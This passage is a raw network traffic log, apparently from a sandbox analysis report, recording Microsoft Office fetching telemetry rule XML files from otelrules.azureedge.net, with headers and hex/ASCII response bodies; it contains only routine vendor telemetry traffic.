                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:51 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                        x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114851Z-174f7845968kvnqxhC1EWRmf3g0000000n80000000002p80
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:51 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        119192.168.2.44986813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:51 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:51 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF497570"
                                                                                        x-ms-request-id: 0ad7255b-c01e-00ad-65a2-42a2b9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114851Z-174f7845968swgbqhC1EWRmnb400000011p00000000005n1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:51 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        120192.168.2.44987013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:51 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:51 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                        x-ms-request-id: c1465301-601e-0050-31f1-412c9c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114851Z-174f7845968zgtf6hC1EWRqd8s0000000uag0000000063q0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:51 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        121192.168.2.44987113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:51 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:51 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                        x-ms-request-id: 4b94b180-301e-0096-61b2-42e71d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114851Z-174f78459685m244hC1EWRgp2c000000118g000000003ke3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        122192.168.2.44987213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:53 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:53 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                        x-ms-request-id: 5692b7f9-f01e-00aa-21f6-418521000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114853Z-174f7845968pf68xhC1EWRr4h800000011k0000000008k9x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        123192.168.2.44987313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:53 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:53 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                        x-ms-request-id: 9875fcdf-d01e-00ad-1c91-3fe942000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114853Z-174f7845968kdththC1EWRzvxn0000000dv0000000000k6h
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:53 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        124192.168.2.44987513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:53 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:53 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                        ETag: "0x8DC582BE976026E"
                                                                                        x-ms-request-id: 460b6522-701e-0097-5815-41b8c1000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114853Z-174f7845968zgtf6hC1EWRqd8s0000000uc0000000003uqm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        125192.168.2.44987413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:53 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:54 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                        x-ms-request-id: aae3b9cd-c01e-0079-6bb3-42e51a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114853Z-174f7845968frfdmhC1EWRxxbw00000011cg000000006pqw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        126192.168.2.44987613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:53 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:54 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                        x-ms-request-id: e83b5619-a01e-000d-5811-41d1ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114853Z-174f78459685m244hC1EWRgp2c0000001140000000009sdm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        127192.168.2.44987713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:55 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:55 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1425
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                        x-ms-request-id: 3266629f-e01e-0020-5891-3fde90000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114855Z-174f7845968nxc96hC1EWRspw8000000111000000000940x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:55 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        128192.168.2.44987913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:55 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:56 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1415
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                        x-ms-request-id: 6c879dfa-801e-0035-6714-41752a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114855Z-174f7845968cdxdrhC1EWRg0en000000119g000000007rcs
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
